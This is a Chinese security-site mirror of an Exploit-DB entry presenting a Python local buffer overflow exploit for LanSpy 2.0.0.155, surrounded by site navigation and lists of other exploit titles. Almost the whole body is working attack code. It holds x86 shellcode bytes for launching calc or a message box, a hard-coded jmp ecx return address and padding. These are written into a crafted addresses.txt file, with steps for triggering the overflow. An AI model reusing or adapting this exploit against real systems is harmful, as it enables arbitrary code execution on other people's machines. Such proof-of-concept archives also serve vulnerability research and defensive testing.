首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 LanSpy 2.0.0.155 - Local Buffer Overflow 来源：https://www.exploit-db.com 作者：n30m1nd 发布时间：2016-10-19   #!/usr/bin/python   ### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###   # Date: 2016-10-18 # Exploit Author: n30m1nd # Vendor Homepage: www.lantricks.com # Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe # Version: LanSpy 2.0.0.155 # Tested on: Tested on Win7 32bit and Win10 64 bit   # Platforms # ========= # Tested on Win7 32bit and Win10 64 bit # This exploit should work everywhere since the binary does not implement DEP nor ASLR   # Credits # ======= # Shouts to hyp3rlinx for the PoC: #   https://www.exploit-db.com/exploits/38399/ #   http://hyp3rlinx.altervista.org/ # And shouts to the crew at Offensive Security for their huge efforts on making #   the infosec community better   # How to # ====== # * Run this python script. It will generate an "addresses.txt" file. # * Replace this file in the root directory of your LanSpy.exe installation. # * Run LanSpy.exe and start the scan or do so by pressing F3. #   - You can also call LanSpy.exe from the command line like the following and #       it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe   # Exploit code # ============   import struct   # 32bit Alphanum-ish shellcodes # Bad chars detected: 00 2d 20   # MessageBoxA at => 00404D80 msgbox_shellcode = (         "\x31\xC0\x50\x68"         "\x70\x77\x6E\x64"         "\x54\x5F\x50\x57"         "\x57\x50\x35\xC4"         "\x80\x80\x55\x35"         "\x44\xCD\xC0\x55"         "\x50\xC3"         )   # WinExec at -> 004EC4FF calc_shellcode = (         "\x31\xC0\x50\x68"         "\x63\x61\x6C\x63"         "\x54\x5F\x50\x57"         "\x35\xC3\x4E\xC3"         "\x55\x35\x3C\x8A"         "\x8D\x55\x50\xC3"         )   # Change the shellcode to be used here scde = calc_shellcode #scde = msgbox_shellcode   # 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides junk = 'A'*(676-126) if len(scde) > 126:     exit("[e] Shellcode is too big! Egghunter maybe? ;)")   # 0040407D => jmp ecx inside LanSpy jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)   # Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode payl = junk + scde + jecx   with open("addresses.txt", "wb") as f:         f.write(payl)         f.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Pluck CMS 4.7.3 - Cross-Site R ·Cgiemail 1.6 - Source Code Dis ·Microsoft Windows (x86) - 'afd ·Windows DeviceApi CMApi PiCMOp ·Microsoft Windows Diagnostics ·Windows DeviceApi CMApi - User ·Ruby on Rails - Dynamic Render ·OpenNMS Java Object Unserializ ·Firefox 49.0.1 - Denial of Ser ·Hak5 WiFi Pineapple Preconfigu ·Ruby on Rails Dynamic Render F ·Hak5 WiFi Pineapple Preconfigu   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved